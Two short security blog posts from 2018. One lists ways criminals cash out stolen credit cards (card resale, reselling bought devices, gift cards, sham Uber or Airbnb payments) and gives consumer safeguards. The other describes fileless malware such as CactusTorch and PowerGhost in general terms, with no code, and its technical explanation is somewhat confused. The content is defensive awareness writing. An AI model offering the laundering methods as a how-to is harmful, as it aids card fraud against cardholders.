2018-08-30

How the cyber-criminal makes money with your credit card details?

Threat

Hackers try to breach eCommerce points or on-line payment services to get credit card information. There is a limited window of time within which the cyber-criminal needs to cash-out or launder the money before the holder of the card will nullify it. These methods may help the victim to prepare and be more vigilant with their credit transactions feeds.

Exploitation

Cyber-criminal will cash-out for example with following ways:

  • Selling credit card numbers on underground markets. There are tens of thousand stolen credit card info traded daily. Price is normally few dollars per card.
  • Using card information to buy easily sellable devices like iPhones, Macbooks, etc. The thief normally distributes purchases to separate cards and separate orders.
  • Buying Amazon, Baidu, Alibaba or Walmart gift cards, which are easy to sell forward.
  • Using Uber or Airbnb service providers for fraudulent payments. Criminal buys fake services from their partner Uber driver or Airbnb renter, who will get payment of this fictitious journey or lodging. 


Protection

The following general advice may apply:
  • Do not give the card details to unknown online commerce sites but use banks or PayPal services instead.
  • Do not click email links appearing your bank, credit card company or other business. These organisations do not approach you asking your details, but it may be phishing attempt to get your details.
  • Use a strong password in any account that has your credit details (Amazon, Souq, etc.)
  • Follow feeds that inform about credit information breaches.
  • Follow closely your credit card events and seek odd transactions.
  • Be quick in cancelling your card even if just a hint of suspicion.

References

  1. https://www.bbc.com/news/technology-44355153
  2. https://www.thebalance.com/ways-avoid-credit-card-fraud-960797

2018-08-05

Fileless malware penetrates conventional virus detection

Definition

Many traditional security systems are based on detecting malware files, but if there is no malware file involved, these systems are rendered useless, making attacks very hard to detect. PowerShell provides full access to Microsoft component object model (COM) and Microsoft Windows management instrumentation (WMI), making it a perfect tool for launching an attack. According to McAfee researchers, one particular fileless threat, dubbed CactusTorch, has grown rapidly and can execute custom shellcode on Windows systems.

Brief Description of Attack Vector

Your sensitive server uses trusted .NET library (Windows Store, Google Play, etc.) and downloads an assembly over Microsoft Component Object Model. The assembly is smallest unit to deploy and application and it does not write any part on the hard drive, so conventional file scanners cannot detect the infection. Since these attacks are launched trough trusted executables, they are hard to detect.

The usage of these fileless infiltrations has been this far:

  • CactusTorch was originally developed to help ethical security testing but since it is open source, it has been used to gain runtime access of computers with over 30 variants for example ransom purposes.
  • PowerGhost hijacks corporate computing resources to mine cryptocurrency

Recommendation for Defence

The following general advice applies:

  • Enterprise should have their own app stored, .NET libraries and MS management hubs to prevent man-in-the-middle attacks.
  • Everyone should have runtime virus detection besides the conventional file scanning.
  • Firewall should block all unidentified connections to prevent the command and control traffic.

References

1. https://www.computerweekly.com/news/252445706/Fileless-malware-a-growing-trend-warns-McAfee?asrc=EM_EDA_98239181&utm_medium=EM&utm_source=EDA&utm_campaign=20180730_How%20F1%20and%20others%20are%20moving%20beyond%20descriptive%20analytics
2. https://securingtomorrow.mcafee.com/mcafee-labs/cactustorch-fileless-threat-abuses-net-to-infect-victims/
3.https://www.computerweekly.com/news/252445642/Brace-for-PowerGhost-cryptominer-warns-Kaspersky-Lab